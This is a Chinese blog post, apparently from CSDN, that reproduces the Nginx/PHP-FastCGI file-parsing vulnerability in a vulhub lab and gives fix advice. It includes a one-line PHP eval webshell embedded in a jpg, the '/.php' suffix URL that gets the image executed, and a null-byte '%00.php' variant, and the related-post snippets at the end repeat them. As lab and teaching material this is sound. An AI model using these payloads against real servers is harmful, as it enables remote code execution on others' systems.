Nginx 文件解析漏洞复现

已于 2023-09-14 12:29:51 修改
阅读量414 收藏
点赞数
文章标签: nginx 运维
于 2023-09-14 12:29:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wutiangui/article/details/132873631
版权

一、漏洞说明
Nginx文件解析漏洞算是一个比较经典的漏洞,接下来我们就通过如下步骤进行漏洞复现,以及进行漏洞的修复。
版本条件:IIS 7.0/IIS 7.5/ Nginx <8.03
二、搭建环境
cd /vulhub/nginx/nginx_parsing_vulnerability
docker-compose up -d
在这里插入图片描述在这里插入图片描述

三、漏洞特征
访问:http://192.168.25.128/uploadfiles/nginx.png
在这里插入图片描述

然后我们输入/.php,可以发现并没有出现文件为找到,而是出现了php的配置信息
在这里插入图片描述

四、漏洞复现
使用界面的上传功能上传一个jpg图片马,jpg内容是@eval($_POST[“fname”]);
在这里插入图片描述

点击上传后
在这里插入图片描述

然后访问:
http://192.168.25.128/uploadfiles/b82ae21729b331095eb02a213284320d.jpg/.php
在这里插入图片描述

五、修复建议
1.php.ini配置文件中的cgi.fix_pathinfo=1设置为0
2.security.limit_extensions=./php
六、Nginx <8.03 空字节代码执行漏洞
影响版本:0.5.,0.6., 0.7 <= 0.7.65, 0.8 <= 0.8.37
当使用PHP-FastCGI执行PHP时,遇到url里面存在%00空字节时与FastCGI的处理不一致,导致可在非PHP文件中嵌入PHP代码,通过访问url+%00.PHP来执行其中的PHP代码。
例如:"http://127.0.0.1/1.jpg%00.php"会把1.jpg文件(木马文件)当做PHP文件来执行。xxx.jpg%00.php

只为了拿0day
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
nginx参数解析漏洞复现
afei001
04-16 5214
目录 1.漏洞概述 2.影响版本 3.漏洞等级 4.漏洞复现 4.1 搭建漏洞环境 4.1 参数解析漏洞复现 5.漏洞修复 1.漏洞概述 该参数解析漏洞与CVE-2013-4547有点像。由于配置不当,导致上传的图片加上“/ .php”即可执行图片中的php代码。 2.影响版本 漏洞是由于配置不当导致,与版本无关。 3.漏洞等级 高危 4.漏洞复现 4.1 搭建漏洞环境 [root@server nginx_p...
nginx解析漏洞复现
胖虎的博客
12-10 311
环境: centos7 docker vulhub 问题描述: 该漏洞nginx和php版本无关,属于用户配置不当造成的 上传文件地址/x.php 原因分析: 1、 由于nginx.conf的配置导致nginx把以’.php’结尾的文件交给fastcgi处理,为此可以构造http://your-ip/uploadfiles/图片名称/.php 2、但是fastcgi在处理’.php’文件时发现文件并不存在,这时php.ini配置文件中cgi.fix_pathinfo=1 发挥作用,这
Nginx解析漏洞复现
最新发布
小司机的奥拓
04-23 629
当然啦,这个配置文件默认其实是有.php的,这个肯定是有这样的需求。其实还有一个原因,那就是php主配置文件中的cgi.fix_pathinfo;选项,这里我们可以从下图看到这个选项是打开的:cgi.fix_pathinfo 是 PHP 主配置文件中的一个选项,用于处理 FastCGI 请求中的 PATHINFO 信息。PATHINFO 是在执行 CGI 程序时从 URL 中提取的附加路径信息,常用于通过 URL 传递参数
Nginx解析漏洞测试
09-19
Nginx是一款高性能的web服务器,使用非常广泛,其不仅经常被用作...默认情况下可能导致服务器错误的将任何类型的文件以PHP的方式进行解析,这将导致严重的安全问题,使得恶意的攻击者可能攻陷支持php的nginx服务器。
Nginx服务器配置文件完全解析
09-30
**Nginx服务器配置文件完全解析** Nginx是一款高性能的HTTP和反向代理服务器,以其高效的异步非阻塞I/O模型而闻名。本文将深入解析Nginx的配置文件,帮助读者理解和掌握如何优化Nginx服务器的性能。 首先,配置...
Python解析nginx日志文件
09-22
Web服务器的各种系统管理工作包括了多Nginx/Apache 日志的统计,python使这个任务变得极其简单,下面我们来详细讲解下具体的做法,有需要的小伙伴可以参考下。
nginx配置文件解析nginx配置文件解析nginx配置文件解析.txt
03-28
nginx
NGINX解析漏洞复现
qq_45862635的博客
04-21 5043
版本信息: Nginx 1.x 最新版 PHP 7.x最新版 由此可知,该漏洞Nginx、php版本无关,属于用户配置不当造成的解析漏洞漏洞复现: 在nginx/nginx_parsing_vulnerability目录下直接执行sudo docker-compose up -d启动环境 访问localhost/uploadfiles/nginx.png查看搭建效果 访问localhost/uploadfiles/nginx.png/.php 在添加/.php后,图片被解析成php文件,这
Nginx 解析漏洞复现
记录笔记
04-15 4534
Nginx 解析漏洞复现漏洞Nginx、php版本无关,属于用户配置不当造成的解析漏洞 http://192.168.15.136/uploadfiles/nginx.png http://192.168.15.136/uploadfiles/nginx.png/.php http://192.168.15.136/123.jpg http://192.168.15.136/123.jpg/123.php ...
Nginx 文件解析漏洞复现
qq_42754807的博客
05-28 643
nginx文件解析漏洞修复
Nginx 解析漏洞复现及利用
Tauil的博客
07-20 7424
Nginx解析漏洞解析漏洞是PHPCGI的漏洞,在PHP的配置文件中有一个关键的选项cgi.fix_pathinfo默认开启,当URL中有不存在的文件,PHP就会向前递归解析在一个文件路径(/xx.jpg)后面加上/xx.php会将/xx.jpg解析为php文件。来上传我们的文件,很显然,不给上传,东西写进去文件被破坏了,被检验出不是正常的jpg不能上传了,可能有些朋友就成功了,因为第一次的时候我是可以的,现在应该是写的内容太多了,出了问题。phpeval($_POST["cmd"]);...
nginx解析漏洞简单复现修复
qq_40907977的博客
09-07 4320
Nginx简介 Nginx是一款轻量级的web服务器/反向代理服务器及电子邮件(IMAP/POP3)代理服务器,其特点是占内存小、并发能力强;国内使用Nginx的有百度、京东、新浪、网易、腾讯、淘宝等 优势 1、作为Web服务器,Nginx处理静态文件、索引文件、自动索引的效率非常高 2、作为代理服务器,Nginx可以实现无缓存的反向代理加速,提高网站运行速度 3、作为负载均衡服务器,Nginx既可以在内部直接支持rails和PHP,也可以支持HTTP代理服务器对外进行服务,同时还支持简单的容错和利用算法进
nginx中间件解析漏洞的影响
06-10
Nginx 中间件解析漏洞是指攻击者利用 Nginx 中间件解析漏洞,通过构造恶意请求,从而绕过服务器的安全措施并执行任意代码。这种漏洞可以允许攻击者在服务器上执行任意的系统命令、读取、修改或删除服务器上的敏感...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值